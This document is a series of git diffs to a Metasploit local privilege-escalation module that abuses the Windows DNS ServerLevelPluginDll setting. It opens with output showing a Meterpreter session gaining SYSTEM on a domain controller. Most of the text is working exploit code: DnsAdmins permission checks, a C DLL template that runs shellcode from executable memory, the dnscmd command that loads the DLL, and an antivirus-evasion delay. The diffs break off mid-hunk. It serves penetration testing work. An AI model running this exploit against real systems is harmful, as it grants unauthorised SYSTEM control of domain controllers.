+[*] Restarting the DNS service...
+[*] Sending stage (206403 bytes) to 192.168.137.133
+[*] Meterpreter session 2 opened (192.168.137.128:4444 -> 192.168.137.133:52986) at 2020-02-25 01:46:06 +0800
+
+meterpreter > sysinfo
+Computer        : DC01
+OS              : Windows 2016+ (10.0 Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : BASILISKCORP
+Logged On Users : 12
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > 
+```

--- a/modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb
+++ b/modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb
@@ -224,15 +224,15 @@ class MetasploitModule < Msf::Exploit::Local
     else
       write_file(dllpath, make_serverlevelplugindll(arch))
       print_good("Wrote DLL to #{dllpath}!")
+      print_status("Sleeping for #{datastore['AVTIMEOUT']} seconds to ensure the file wasn't caught by any AV...")
+      sleep(datastore['AVTIMEOUT'])
+      unless file_exist?(dllpath.to_s)
+        print_error('Woops looks like the DLL got picked up by AV or somehow got deleted...')
+        return
+      end
+      print_good("Looks like our file wasn't caught by the AV.")
     end
 
-    print_status("Sleeping for #{datastore['AVTIMEOUT']} seconds to ensure the file wasn't caught by any AV...")
-    sleep(datastore['AVTIMEOUT'])
-    unless file_exist?(dllpath.to_s)
-      print_error('Woops looks like the DLL got picked up by AV or somehow got deleted...')
-      return
-    end
-    print_good("Looks like our file wasn't caught by the AV.")
     print_warning('Entering danger section...')
 
     print_status("Modifying ServerLevelPluginDll to point to #{dllpath}...")

--- a/modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb
+++ b/modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb
@@ -215,10 +215,30 @@ class MetasploitModule < Msf::Exploit::Local
     #    the target falls back to SMB1
     dllpath = expand_path("#{datastore['DLLPATH']}\\#{datastore['DLLNAME']}").strip
     if datastore['DLLPATH'].start_with?('\\\\')
-      # check if "Enable insecure guest logons" is enabled on the target system
-      allow_insecure_guest_auth = registry_getvaldata('HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanWorkstation\\Parameters', 'AllowInsecureGuestAuth')
-      unless allow_insecure_guest_auth == 1
-        fail_with(Failure::BadConfig, "'Enable insecure guest logons' is not set to Enabled on the target system!")
+
+      # Using session.shell_command_token over cmd_exec() here as @wvu-r7 noticed cmd_exec() was broken under some situations.
+      build_num_raw = session.shell_command_token('cmd.exe /c ver')
+      build_num = build_num_raw.match(/\d+\.\d+\.\d+\.\d+/)
+      if build_num.nil?
+        print_error("Couldn't retrieve the target's build number!")
+        return
+      else
+        build_num = build_num_raw.match(/\d+\.\d+\.\d+\.\d+/)[0]
+        vprint_status("Target's build number: #{build_num}")
+      end
+
+      build_num_gemversion = Gem::Version.new(build_num)
+
+      # If the target is running Windows 10 or Windows Server versions with a 
+      # build number of 16299 or later, aka v1709 or later, then we need to check
+      # if "Enable insecure guest logons" is enabled on the target system as per
+      # https://support.microsoft.com/en-us/help/4046019/guest-access-in-smb2-disabled-by-default-in-windows-10-and-windows-ser
+      if (build_num_gemversion >= Gem::Version.new('10.0.16299.0'))
+        # check if "Enable insecure guest logons" is enabled on the target system
+        allow_insecure_guest_auth = registry_getvaldata('HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanWorkstation\\Parameters', 'AllowInsecureGuestAuth')
+        unless allow_insecure_guest_auth == 1
+          fail_with(Failure::BadConfig, "'Enable insecure guest logons' is not set to Enabled on the target system!")
+        end
       end
       print_status('Using user-provided UNC path.')
     else

--- a/modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb
+++ b/modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb
@@ -6,20 +6,18 @@
 class MetasploitModule < Msf::Exploit::Local
   Rank = NormalRanking
 
-  include Msf::Exploit::EXE
   include Msf::Post::File
   include Msf::Post::Windows::Priv
   include Msf::Post::Windows::Services
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'DnsAdmin ServerLevelPluginDLL Feature Abuse Privilege Escalation',
+      'Name'           => 'DnsAdmin ServerLevelPluginDll Feature Abuse Privilege Escalation',
       'Description'    => %q(
         This module exploits a feature in the DNS service of Windows Server. Users of the DnsAdmins group can set the
-        ServerLevelPluginDll value using dnscmd.exe to create a registry key at HKLM\SYSTEM\CurrentControlSet\services\DNS\Parameters\
-        named ServerLevelPluginDll that can be made to point to an arbitrary DLL. After doing so, restarting the service will load the DLL
-        and cause it to execute, providing us with SYSTEM privileges. Using the Metasploit-generated DLL will cause the service to become
-        unresponsive, and will require removing the registry key and rebooting to get it working again.
+        `ServerLevelPluginDll` value using dnscmd.exe to create a registry key at `HKLM\SYSTEM\CurrentControlSet\services\DNS\Parameters\`
+        named `ServerLevelPluginDll` that can be made to point to an arbitrary DLL. After doing so, restarting the service
+        will load the DLL and cause it to execute, providing us with SYSTEM privileges.
       ),
       'References'     =>
         [
@@ -51,56 +49,51 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    if is_system?
-      print_status("Session is already elevated!")
-      return Exploit::CheckCode::Unknown
-    end
-
     username = client.sys.config.getuid
     user_sid = client.sys.config.getsid
     hostname = sysinfo['Computer']
-    print_status("Running check against #{hostname} as user #{username}...")
+    vprint_status("Running check against #{hostname} as user #{username}...")
 
     srv_info = service_info("DNS")
     if srv_info.nil?
-      print_bad("Unable to enumerate the DNS service!")
+      vprint_error("Unable to enumerate the DNS service!")
       return Exploit::CheckCode::Unknown
     end
 
     if srv_info && srv_info[:display].empty?
-      print_bad("The DNS service does not exist on this host!")
+      vprint_error("The DNS service does not exist on this host!")
       return Exploit::CheckCode::Safe
     end
 
     # for use during permission check
-    dacl_items = srv_info[:dacl].split("D:")[1].split("(")
-    dacl_items.each do |dacl_item|
-      dacl_item.delete_suffix!(")")
+    if srv_info[:dacl].nil?
+      vprint_error("Unable to determine permissions on the DNS service!")
+      return Exploit::CheckCode::Unknown
     end
+    dacl_items = srv_info[:dacl].split("D:")[1].scan(/\((.+?)\)/)
 
-    print_good("DNS service found on #{hostname}.")
+    vprint_good("DNS service found on #{hostname}.")
 
     # user must be a member of the DnsAdmins group to be able to change ServerLevelPluginDll
     group_membership = get_whoami
     unless group_membership
-      print_bad("Unable to enumerate group membership!")
+      vprint_error("Unable to enumerate group membership!")
       return Exploit::CheckCode::Unknown
     end
 
     unless group_membership.include? "DnsAdmins"
-      print_bad("User #{username} is not part of the DnsAdmins group!")
+      vprint_error("User #{username} is not part of the DnsAdmins group!")
       return Exploit::CheckCode::Safe
     end
 
-
     # find the DnsAdmins group SID
     dnsadmin_sid = ""
-    group_membership.split("\n").each do |line|
+    group_membership.each_line do |line|
       unless line.include? "DnsAdmins"
         next
       end
 
-      print_good("User #{username} is part of the DnsAdmins group.")
+      vprint_good("User #{username} is part of the DnsAdmins group.")
       line.split.each do |item|
         unless item.include? "S-"
           next
@@ -114,18 +107,18 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     # check if the user or DnsAdmins group has the proper permissions to start/stop the DNS service
-    if dacl_items.any? { |dacl_item| dacl_item.include? dnsadmin_sid }
-      dnsadmin_dacl = dacl_items.select { |dacl_item| dacl_item.include? dnsadmin_sid }[0]
+    if dacl_items.any? { |dacl_item| dacl_item[0].include? dnsadmin_sid }
+      dnsadmin_dacl = dacl_items.select { |dacl_item| dacl_item[0].include? dnsadmin_sid }[0]
       if dnsadmin_dacl.include? "RPWP"
-        print_good("Members of the DnsAdmins group can start/stop the DNS service.")
+        vprint_good("Members of the DnsAdmins group can start/stop the DNS service.")
       end
-    elsif dacl_items.any? { |dacl_item| dacl_item.include? user_sid }
-      user_dacl = dacl_items.select { |dacl_item| dacl_item.include? user_sid }[0]
+    elsif dacl_items.any? { |dacl_item| dacl_item[0].include? user_sid }
+      user_dacl = dacl_items.select { |dacl_item| dacl_item[0].include? user_sid }[0]
       if user_dacl.include? "RPWP"
-        print_good("User #{username} can start/stop the DNS service.")
+        vprint_good("User #{username} can start/stop the DNS service.")
       end
     else
-      print_bad("User #{username} does not have permissions to start/stop the DNS service!")
+      vprint_error("User #{username} does not have permissions to start/stop the DNS service!")
       return Exploit::CheckCode::Safe
     end
 
@@ -134,10 +127,11 @@ class MetasploitModule < Msf::Exploit::Local
 
   def exploit
     if is_system?
-      fail_with(Failure::None, "Session is already elevated!")
+      fail_with(Failure::BadConfig, "Session is already elevated!")
     end
 
-    if sysinfo['Architecture'] != payload_instance.arch.first
+    arch = sysinfo['Architecture']
+    if arch != payload_instance.arch.first
       fail_with(Failure::BadConfig, "Wrong payload architecture!")
     end
 
@@ -156,7 +150,7 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     # the if block assumes several things:
-    # 1. operator has set up their own SMB share (SMB2 is default for most targets)
+    # 1. operator has set up their own SMB share (SMB2 is default for most targets), as MSF does not support SMB2 yet
     # 2. operator has generated their own DLL with the correct payload and architecture
     # 3. operator's SMB share is accessible from the target. "Enable insecure guest logons" is "Enabled" on the target or
     #    the target falls back to SMB1
@@ -170,24 +164,60 @@ class MetasploitModule < Msf::Exploit::Local
 
       print_status("Using user-provided UNC path.")
     else
-      print_status("Creating the payload DLL (#{sysinfo['Architecture']})...")
-      opts = {}
-      opts[:arch] = [sysinfo['Architecture']]
-      dll = generate_payload_dll(opts)
+      payload = generate_payload
+      c_template = %Q|
+        #include <Windows.h>
+        #include <stdlib.h>
+        #include <String.h>
+
+        BOOL APIENTRY DllMain __attribute__((export))(HMODULE hModule, DWORD dwReason, LPVOID lpReserved) {
+          switch (dwReason) {
+            case DLL_PROCESS_ATTACH:
+            case DLL_THREAD_ATTACH:
+            case DLL_THREAD_DETACH:
+            case DLL_PROCESS_DETACH:
+              break;
+          }
+          return TRUE;
+        }
+
+        int DnsPluginCleanup __attribute__((export))(void) { return 0; }
+        int DnsPluginQuery __attribute__((export))(PVOID a1, PVOID a2, PVOID a3, PVOID a4) { return 0; }
+        int DnsPluginInitialize __attribute__((export))(PVOID a1, PVOID a2) {
+          char shellcode[] = "\xaa\xbb\xcc\xdd";
+          void *exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+          memcpy(exec, shellcode, sizeof shellcode);
+          ((void(*)())exec)();
+          return 0;
+        }
+      |
+
+      c_template.gsub!("\xaa\xbb\xcc\xdd", Rex::Text.to_hex(payload.raw).to_s)
+
+      cpu = nil
+      if arch == "x86"
+        cpu = Metasm::Ia32.new
+      elsif arch == "x64"
+        cpu = Metasm::X86_64.new
+      end
+
+      print_status("Building DLL...")
+      require 'metasploit/framework/compiler/windows'
+      dll = Metasploit::Framework::Compiler::Windows.compile_c(c_template, :dll, cpu)
 
       print_status("Writing DLL to #{dllpath}...")
       write_file(dllpath, dll)
     end
 
     print_status("Modifying ServerLevelPluginDll to point to #{dllpath}...")
-    dnscmd_result = cmd_exec("cmd.exe /c dnscmd \\\\#{sysinfo['Computer']} /config /serverlevelplugindll #{dllpath}").strip
-    if dnscmd_result.include? "success"
-      print_good(dnscmd_result.split("\n")[0])
-      print_status("Restarting the DNS service...")
-      service_stop("DNS")
-      service_start("DNS")
-    else
+    dnscmd_result = cmd_exec("cmd.exe /c dnscmd \\\\#{sysinfo['Computer']} /config /serverlevelplugindll #{dllpath}").to_s.strip
+    unless dnscmd_result.include? "success"
       fail_with(Failure::UnexpectedReply, dnscmd_result.split("\n")[0])
     end
+
+    print_good(dnscmd_result.split("\n")[0])
+    print_status("Restarting the DNS service...")
+    service_stop("DNS")
+    service_start("DNS")
   end
 end

--- a/modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb
+++ b/modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb
@@ -1,0 +1,184 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = GreatRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Post::File
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Services
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'DnsAdmin ServerLevelPluginDLL Feature Abuse Privilege Escalation',
+      'Description'    => %q(
+        This module exploits a feature in the DNS service of Windows Server. Users of the DnsAdmins group can set the
+        ServerLevelPluginDll value using dnscmd.exe to create a registry key at HKLM\SYSTEM\CurrentControlSet\services\DNS\Parameters\
+        named ServerLevelPluginDll that can be made to point to an arbitrary DLL. After doing so, restarting the service will load the DLL
+        and cause it to execute, providing us with SYSTEM privileges. Using the Metasploit-generated DLL will cause the service to become
+        unresponsive, and will require removing the registry key and rebooting to get it working again.
+      ),
+      'References'     =>
+        [
+          ['URL', 'https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83'],
+          ['URL', 'https://adsecurity.org/?p=4064'],
+          ['URL', 'http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html']
+        ],
+      'DisclosureDate' => "May 08 2017",
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Shay Ber', # vulnerability discovery
+          'Imran E. Dawoodjee <imran[at]threathounds.com>' # Metasploit module
+        ],
+      'Platform'       => 'win',
+      'Targets'        => [['Automatic', {}]],
+      'SessionTypes'   => [ 'meterpreter' ],
+      'DefaultOptions' => { 'WfsDelay' => 10 })
+    )
+
+    register_options(
+      [
+        OptString.new('DLLNAME', [ false, 'DLL name (default: msf.dll)', "msf.dll"]),
+        OptString.new('DLLPATH', [ false, 'Path to DLL. Can be a UNC path. (default: %TEMP%)', "%TEMP%"])
+      ]
+    )
+
+    deregister_options('FILE_CONTENTS')
+  end
+
+  def check
+    username = client.sys.config.getuid
+    user_sid = client.sys.config.getsid
+    hostname = sysinfo['Computer']
+    print_status("Running check against #{hostname} as user #{username}...")
+
+    srv_info = service_info("DNS")
+    if srv_info.nil?
+      print_bad("Unable to enumerate the DNS service!")
+      return Exploit::CheckCode::Unknown
+    end
+
+    if srv_info && srv_info[:display].empty?
+      print_bad("The DNS service does not exist on this host!")
+      return Exploit::CheckCode::Safe
+    end
+
+    # for use during permission check
+    dacl_items = srv_info[:dacl].split("D:")[1].split("(")
+    dacl_items.each do |dacl_item|
+      dacl_item.delete_suffix!(")")
+    end
+
+    print_good("DNS service found on #{hostname}.")
+
+    # user must be a member of the DnsAdmins group to be able to change ServerLevelPluginDll
+    group_membership = get_whoami
+    unless group_membership
+      print_bad("Unable to enumerate group membership!")
+      return Exploit::CheckCode::Unknown
+    end
+
+    unless group_membership.include? "DnsAdmins"
+      print_bad("User #{username} is not part of the DnsAdmins group!")
+      return Exploit::CheckCode::Safe
+    end
+
+
+    # find the DnsAdmins group SID
+    dnsadmin_sid = ""
+    group_membership.split("\n").each do |line|
+      unless line.include? "DnsAdmins"
+        next
+      end
+
+      print_good("User #{username} is part of the DnsAdmins group.")
+      line.split.each do |item|
+        unless item.include? "S-"
+          next
+        end
+
+        vprint_status("DnsAdmins SID is #{item}")
+        dnsadmin_sid = item
+        break
+      end
+      break
+    end
+
+    # check if the user or DnsAdmins group has the proper permissions to start/stop the DNS service
+    if dacl_items.any? { |dacl_item| dacl_item.include? dnsadmin_sid }
+      dnsadmin_dacl = dacl_items.select { |dacl_item| dacl_item.include? dnsadmin_sid }[0]
+      if dnsadmin_dacl.include? "RPWP"
+        print_good("Members of the DnsAdmins group can start/stop the DNS service.")
+      end
+    elsif dacl_items.any? { |dacl_item| dacl_item.include? user_sid }
+      user_dacl = dacl_items.select { |dacl_item| dacl_item.include? user_sid }[0]
+      if user_dacl.include? "RPWP"
+        print_good("User #{username} can start/stop the DNS service.")
+      end
+    else
+      print_bad("User #{username} does not have permissions to start/stop the DNS service!")
+      return Exploit::CheckCode::Safe
+    end
+
+    Exploit::CheckCode::Vulnerable
+  end
+
+  def exploit
+    if sysinfo['Architecture'] != payload_instance.arch.first
+      fail_with(Failure::BadConfig, "Wrong payload architecture!")
+    end
+
+    unless [CheckCode::Vulnerable].include? check
+      fail_with Failure::NotVulnerable, "Target is most likely not vulnerable!"
+    end
+
+    # if the DNS service is not started, it will throw RPC_S_SERVER_UNAVAILABLE when trying to set ServerLevelPluginDll
+    print_status("Checking service state...")
+    svc_state = service_status("DNS")
+    if svc_state[:state] == 4
+      print_status("DNS service is running, proceeding...")
+    else
+      print_status("DNS service is stopped, starting it...")
+      service_start("DNS")
+    end
+
+    # the if block assumes several things:
+    # 1. operator has set up their own SMB share (SMB2 is default for most targets)
+    # 2. operator has generated their own DLL with the correct payload and architecture
+    # 3. operator's SMB share is accessible from the target. "Enable insecure guest logons" is "Enabled" on the target or
+    #    the target falls back to SMB1
+    dllpath = expand_path("#{datastore['DLLPATH']}\\#{datastore['DLLNAME']}").strip
+    if datastore['DLLPATH'].start_with?("\\\\")
+      # check if "Enable insecure guest logons" is enabled on the target system
+      allow_insecure_guest_auth = registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanWorkstation\\Parameters", "AllowInsecureGuestAuth")
+      if allow_insecure_guest_auth == 1
+        fail_with Failure::BadConfig, "'Enable insecure guest logons' is not set to Enabled on the target system!"
+      end
+
+      print_status("Using user-provided UNC path.")
+    else
+      print_status("Creating the payload DLL (#{sysinfo['Architecture']})...")
+      opts = {}
+      opts[:arch] = [sysinfo['Architecture']]
+      dll = generate_payload_dll(opts)
+
+      print_status("Writing DLL to #{dllpath}...")
+      write_file(dllpath, dll)
+    end
+
+    print_status("Modifying ServerLevelPluginDll to point to #{dllpath}...")
+    dnscmd_result = cmd_exec("cmd.exe /c dnscmd \\\\#{sysinfo['Computer']} /config /serverlevelplugindll #{dllpath}").strip
+    if dnscmd_result.include? "success"
+      print_good(dnscmd_result.split("\n")[0])
+      print_status("Restarting the DNS service...")
+      service_stop("DNS")
+      service_start("DNS")
+    else
+      fail_with Failure::UnexpectedReply, dnscmd_result.split("\n")[0]
+    end
+  end
+end

--- a/modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb
+++ b/modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb
@@ -62,7 +62,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    if sysinfo['OS'] =~ /Windows 20(03|08|12|16+)/
+    if sysinfo['OS'] =~ /Windows 20(03|08|12|16\+|16)/
       vprint_good("OS seems vulnerable.")
     else
       vprint_error("OS is not vulnerable!")

--- a/modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb
+++ b/modules/exploits/windows/local/dnsadmin_serverlevelplugindll.rb
@@ -14,57 +14,60 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Exploit::FileDropper
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'DnsAdmin ServerLevelPluginDll Feature Abuse Privilege Escalation',
-      'Description'    => %q(
-        This module exploits a feature in the DNS service of Windows Server. Users of the DnsAdmins group can set the
-        `ServerLevelPluginDll` value using dnscmd.exe to create a registry key at `HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\\`
-        named `ServerLevelPluginDll` that can be made to point to an arbitrary DLL. After doing so, restarting the service
-        will load the DLL and cause it to execute, providing us with SYSTEM privileges. Increasing WfsDelay is recommended
-        when using a UNC path.
+    super(
+      update_info(
+        info,
+        'Name' => 'DnsAdmin ServerLevelPluginDll Feature Abuse Privilege Escalation',
+        'Description' => %q{
+          This module exploits a feature in the DNS service of Windows Server. Users of the DnsAdmins group can set the
+          `ServerLevelPluginDll` value using dnscmd.exe to create a registry key at `HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\`
+          named `ServerLevelPluginDll` that can be made to point to an arbitrary DLL. After doing so, restarting the service
+          will load the DLL and cause it to execute, providing us with SYSTEM privileges. Increasing WfsDelay is recommended
+          when using a UNC path.
 
-        Note that there is a slight possibilty that antivirus may pick up on the DLL file which is dropped on the system for this
-        exploit to work. In this case it will not be possible to restart the DNS service via the Service Manager. To resolve this, 
-        users must first delete the `ServerLevelPluginDll` value under the `HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\\` 
-        key using an administrator account, after which they will then be able to restart the DNS service once again.
+          Note that there is a slight possibilty that antivirus may pick up on the DLL file which is dropped on the system for this
+          exploit to work. In this case it will not be possible to restart the DNS service via the Service Manager. To resolve this,
+          users must first delete the `ServerLevelPluginDll` value under the `HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\`
+          key using an administrator account, after which they will then be able to restart the DNS service once again.
 
-        To avoid the potential of this occuring, this module has a configurable option, `AVTIMEOUT`, which allows users to configure
-        how long they would like to wait for any potential AV to pick up on the file after which the module will then check to 
-        ensure the dropped DLL file exists prior to creating the `ServerLevelPluginDll` value within the 
-        `HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters\\` key.
-      ),
-      'References'     =>
-        [
-          ['URL', 'https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83'],
-          ['URL', 'https://adsecurity.org/?p=4064'],
-          ['URL', 'http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html']
-        ],
-      'DisclosureDate' => "May 08 2017",
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
-          'Shay Ber', # vulnerability discovery
-          'Imran E. Dawoodjee <imran[at]threathounds.com>' # Metasploit module
-        ],
-      'Platform'       => 'win',
-      'Targets'        => [[ 'Automatic', {} ]],
-      'SessionTypes'   => [ 'meterpreter' ],
-      'DefaultOptions' =>
-        {
-          'WfsDelay' => 20,
-          'EXITFUNC' => 'thread'
+          To avoid the potential of this occuring, this module has a configurable option, `AVTIMEOUT`, which allows users to configure
+          how long they would like to wait for any potential AV to pick up on the file after which the module will then check to
+          ensure the dropped DLL file exists prior to creating the `ServerLevelPluginDll` value within the
+          `HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\` key.
         },
-      'Notes'          =>
-        {
-          'Stability'   => [CRASH_SAFE],
-          'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]
-        })
+        'References' =>
+          [
+            ['URL', 'https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83'],
+            ['URL', 'https://adsecurity.org/?p=4064'],
+            ['URL', 'http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html']
+          ],
+        'DisclosureDate' => 'May 08 2017',
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Shay Ber', # vulnerability discovery
+            'Imran E. Dawoodjee <imran[at]threathounds.com>' # Metasploit module
+          ],
+        'Platform' => 'win',
+        'Targets' => [[ 'Automatic', {} ]],
+        'SessionTypes' => [ 'meterpreter' ],
+        'DefaultOptions' =>
+          {
+            'WfsDelay' => 20,
+            'EXITFUNC' => 'thread'
+          },
+        'Notes' =>
+          {
+            'Stability' => [CRASH_SAFE],
+            'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]
+          }
+      )
     )
 
     register_options(
       [
-        OptString.new('DLLNAME', [ true, 'DLL name (default: msf.dll)', "msf.dll"]),
-        OptString.new('DLLPATH', [ true, 'Path to DLL. Can be a UNC path. (default: %TEMP%)', "%TEMP%"]),
+        OptString.new('DLLNAME', [ true, 'DLL name (default: msf.dll)', 'msf.dll']),
+        OptString.new('DLLPATH', [ true, 'Path to DLL. Can be a UNC path. (default: %TEMP%)', '%TEMP%']),
         OptBool.new('MAKEDLL', [ true, 'Just create the DLL, do not exploit.', false]),
         OptInt.new('AVTIMEOUT', [true, 'Time to wait for AV to potentially notice the DLL file we dropped, in seconds.', 60])
       ]
@@ -75,9 +78,9 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     if sysinfo['OS'] =~ /Windows 20(03|08|12|16\+|16)/
-      vprint_good("OS seems vulnerable.")
+      vprint_good('OS seems vulnerable.')
     else
-      vprint_error("OS is not vulnerable!")
+      vprint_error('OS is not vulnerable!')
       return Exploit::CheckCode::Safe
     end
 
@@ -86,48 +89,48 @@ class MetasploitModule < Msf::Exploit::Local
     hostname = sysinfo['Computer']
     vprint_status("Running check against #{hostname} as user #{username}...")
 
-    srv_info = service_info("DNS")
+    srv_info = service_info('DNS')
     if srv_info.nil?
-      vprint_error("Unable to enumerate the DNS service!")
+      vprint_error('Unable to enumerate the DNS service!')
       return Exploit::CheckCode::Unknown
     end
 
     if srv_info && srv_info[:display].empty?
-      vprint_error("The DNS service does not exist on this host!")
+      vprint_error('The DNS service does not exist on this host!')
       return Exploit::CheckCode::Safe
     end
 
     # for use during permission check
     if srv_info[:dacl].nil?
-      vprint_error("Unable to determine permissions on the DNS service!")
+      vprint_error('Unable to determine permissions on the DNS service!')
       return Exploit::CheckCode::Unknown
     end
-    dacl_items = srv_info[:dacl].split("D:")[1].scan(/\((.+?)\)/)
+    dacl_items = srv_info[:dacl].split('D:')[1].scan(/\((.+?)\)/)
 
     vprint_good("DNS service found on #{hostname}.")
 
     # user must be a member of the DnsAdmins group to be able to change ServerLevelPluginDll
     group_membership = get_whoami
     unless group_membership
-      vprint_error("Unable to enumerate group membership!")
+      vprint_error('Unable to enumerate group membership!')
       return Exploit::CheckCode::Unknown
     end
 
-    unless group_membership.include? "DnsAdmins"
+    unless group_membership.include? 'DnsAdmins'
       vprint_error("User #{username} is not part of the DnsAdmins group!")
       return Exploit::CheckCode::Safe
     end
 
     # find the DnsAdmins group SID
-    dnsadmin_sid = ""
+    dnsadmin_sid = ''
     group_membership.each_line do |line|
-      unless line.include? "DnsAdmins"
+      unless line.include? 'DnsAdmins'
         next
       end
 
       vprint_good("User #{username} is part of the DnsAdmins group.")
       line.split.each do |item|
-        unless item.include? "S-"
+        unless item.include? 'S-'
           next
         end
 
@@ -141,12 +144,12 @@ class MetasploitModule < Msf::Exploit::Local
     # check if the user or DnsAdmins group has the proper permissions to start/stop the DNS service
     if dacl_items.any? { |dacl_item| dacl_item[0].include? dnsadmin_sid }
       dnsadmin_dacl = dacl_items.select { |dacl_item| dacl_item[0].include? dnsadmin_sid }[0]
-      if dnsadmin_dacl.include? "RPWP"
-        vprint_good("Members of the DnsAdmins group can start/stop the DNS service.")
+      if dnsadmin_dacl.include? 'RPWP'
+        vprint_good('Members of the DnsAdmins group can start/stop the DNS service.')
       end
     elsif dacl_items.any? { |dacl_item| dacl_item[0].include? user_sid }
       user_dacl = dacl_items.select { |dacl_item| dacl_item[0].include? user_sid }[0]
-      if user_dacl.include? "RPWP"
+      if user_dacl.include? 'RPWP'
         vprint_good("User #{username} can start/stop the DNS service.")
       end
     else
@@ -161,7 +164,7 @@ class MetasploitModule < Msf::Exploit::Local
     # get system architecture
     arch = sysinfo['Architecture']
     if arch != payload_instance.arch.first
-      fail_with(Failure::BadConfig, "Wrong payload architecture!")
+      fail_with(Failure::BadConfig, 'Wrong payload architecture!')
     end
 
     # no exploit, just create the DLL
@@ -169,39 +172,39 @@ class MetasploitModule < Msf::Exploit::Local
       # copypasta from lib/msf/core/exploit/fileformat.rb
       # writes the generated DLL to ~/.msf4/local/
       dllname = datastore['DLLNAME']
-      full_path = store_local("dll", nil, make_serverlevelplugindll(arch), dllname)
+      full_path = store_local('dll', nil, make_serverlevelplugindll(arch), dllname)
       print_good("#{dllname} stored at #{full_path}")
       return
     end
 
     # will exploit
     if is_system?
-      fail_with(Failure::BadConfig, "Session is already elevated!")
+      fail_with(Failure::BadConfig, 'Session is already elevated!')
     end
 
     unless [CheckCode::Vulnerable].include? check
-      fail_with(Failure::NotVulnerable, "Target is most likely not vulnerable!")
+      fail_with(Failure::NotVulnerable, 'Target is most likely not vulnerable!')
     end
 
     # if the DNS service is not started, it will throw RPC_S_SERVER_UNAVAILABLE when trying to set ServerLevelPluginDll
-    print_status("Checking service state...")
-    svc_state = service_status("DNS")
+    print_status('Checking service state...')
+    svc_state = service_status('DNS')
     unless svc_state[:state] == 4
-      print_status("DNS service is stopped, starting it...")
-      service_start("DNS")
+      print_status('DNS service is stopped, starting it...')
+      service_start('DNS')
     end
 
     # the service must be started before proceeding
     total_wait_time = 0
     loop do
-      svc_state = service_status("DNS")
+      svc_state = service_status('DNS')
       if svc_state[:state] == 4
         sleep 1
         break
       else
         sleep 2
         total_wait_time += 2
-        fail_with(Failure::TimeoutExpired, "Was unable to start the DNS service after 3 minutes of trying...") if total_wait_time >= 90
+        fail_with(Failure::TimeoutExpired, 'Was unable to start the DNS service after 3 minutes of trying...') if total_wait_time >= 90
       end
     end
 
@@ -211,13 +214,13 @@ class MetasploitModule < Msf::Exploit::Local
     # 3. operator's SMB share is accessible from the target. "Enable insecure guest logons" is "Enabled" on the target or
     #    the target falls back to SMB1
     dllpath = expand_path("#{datastore['DLLPATH']}\\#{datastore['DLLNAME']}").strip
-    if datastore['DLLPATH'].start_with?("\\\\")
+    if datastore['DLLPATH'].start_with?('\\\\')
       # check if "Enable insecure guest logons" is enabled on the target system
-      allow_insecure_guest_auth = registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanWorkstation\\Parameters", "AllowInsecureGuestAuth")
+      allow_insecure_guest_auth = registry_getvaldata('HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanWorkstation\\Parameters', 'AllowInsecureGuestAuth')
       unless allow_insecure_guest_auth == 1
         fail_with(Failure::BadConfig, "'Enable insecure guest logons' is not set to Enabled on the target system!")
       end
-      print_status("Using user-provided UNC path.")
+      print_status('Using user-provided UNC path.')
     else
       write_file(dllpath, make_serverlevelplugindll(arch))
       print_good("Wrote DLL to #{dllpath}!")
@@ -225,37 +228,37 @@ class MetasploitModule < Msf::Exploit::Local
 
